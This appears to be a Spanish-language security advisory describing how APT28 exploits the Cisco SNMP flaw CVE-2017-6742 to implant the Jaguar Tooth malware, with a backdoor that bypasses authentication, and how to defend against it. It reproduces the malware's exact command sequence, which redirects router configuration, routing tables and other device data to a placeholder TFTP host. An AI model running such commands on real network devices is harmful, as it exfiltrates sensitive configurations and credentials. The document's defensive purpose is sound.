A través de la explotación de la vulnerabilidad CVE-2017-6742, APT28 utiliza un exploit SNMP y así instalar malware, este malware obtiene información de los dispositivos la cual es filtrada mediante un archivo TFTP y permite el acceso no autenticado por medio de una puerta trasera.
reconocimiento
El protocolo simple de administración de red (SNMP) está diseñado para permitir a los administradores de red, monitorear y configurar dispositivos de red de manera remota, a su vez, este protocolo puede ser utilizado para obtener información de red sensible y, si es vulnerable, explotar los dispositivos para finalmente penetrar en la red.
Existe una gran variedad de herramientas de software que pueden escanear la red completa, haciendo uso de SNMP, lo que significa que configuraciones pobres, podrían hacer a la red susceptible a ataques.
Las cadenas de comunidad SNMP débiles, incluyendo la predeterminada ‘public’, permiten a APT28 obtener acceso a la información de las interfaces del router. Los router comprometidos se configuran para aceptar solicitudes SNMP v2. SNMP v2 no admite cifrado, por lo que todos los datos, incluyendo cadenas de comunidad, es enviado desencriptado.
Para algunos de los dispositivos objetivo, APT28 hace uso de un exploit SNMP pue permite el despliegue de malware (Jaguar Tooth malware) el cual recopila mayor información sobre el dispositivo, la cual es filtrada por medio del protocolo de transferencia de archivos Trivial (TFTP), y habilita un acceso no autorizado por medio de una puerta trasera (backdoor).
jaguar tooth
Jaguar Tooth es implantado haciendo uso de la vulnerabilidad parchada de SNMP rastreada como CVE-2017-6742. El cual habría sido anunciado por Cisco en 29 de junio de 2017. Esta vulnerabilidad crea un búfer basado en pila para causar un desbordamiento, habilitando así el control del puntero de que puede ser utilizado para obtener la ejecución remota de código.
Este habilita un acceso de puerta trasera, no autenticado, parcheando las rutinas de identificación de Cisco IOS. Esto garantiza acceso a cuentas locales existentes, sin comprobar las contraseñas proporcionadas al conectarse mediante Telnet o bien sesión física.
El malware, a su vez, también crea procesos nuevos, llamados Service Police Lock, la cual colecta de manera automática para luego filtrara mediante TFTP. Esto incluye información de dispositivos, tales como la configuración en ejecución, versión de firmware, listas de directorio o memoria flash, e información de la red incluyendo el protocolo de resolución de direcciones (ARP) y tablas de enrutamiento, interfases y otros router conectados.
filtracion de la informacion
Jaguar Tooth colecta y filtra una gran variedad de información de los dispositivos que afecta, los cuales son conseguidos haciendo uso de los siguientes comandos de la Interfaz de línea de comandos (CLI) de Cisco IOS:
- show running-config
- show version
- show ip interface brief
- show arp
- show cdp neighbors
- show start
- show ip route
- show flash
Específicamente, Jaguar Tooth ejecuta los siguientes comandos abreviados de CLI de Cisco IOS y Tcl, filtrando la información recolectara, mediante TFTP usando el comando redirect.
- sleep 5000
- enable
- sh run | r tftp://[IP ADDRESS]/[URL PAGE]
- sleep 5000
- sh ver | r tftp://[IP ADDRESS]/[URL PAGE]
- sleep 5000
- sh ip int bri | r tftp://[IP ADDRESS]/[URL PAGE]
- sleep 5000
- sh arp | r tftp://[IP ADDRESS]/[URL PAGE]
- sleep 5000
- sh cdp neig | r tftp://[IP ADDRESS]/[URL PAGE]
- sleep 5000
- sh start | r tftp://[IP ADDRESS]/[URL PAGE]
- sleep 5000
- sh ip ro | r tftp://[IP ADDRESS]/[URL PAGE]
- sleep 5000
- sh fla | r tftp://[IP ADDRESS]/[URL PAGE]
- sleep 5000
- disable
- tclquit
recomendaciones
- Parchear los dispositivos por recomendación de Cisco.
- No usar SNMP si no se requiere configurar o gestionar los dispositivos de manera remota y así prevenir que usuarios no autorizados acedan al router.
- Implementar fuertes políticas sobre contraseñas, como no usar las mismas contraseñas, implementar autentificación multifactorial.
- Desactive los protocolos no cifrados heredados, como Telnet y SNMP v1 o v2c. Siempre que sea posible, utilice protocolos cifrados modernos como SSH y SNMP v3.
